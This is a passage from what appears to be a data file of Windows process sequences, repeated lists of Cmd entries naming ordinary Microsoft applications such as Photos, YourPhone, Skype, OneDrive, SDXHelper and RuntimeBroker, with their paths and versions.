office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 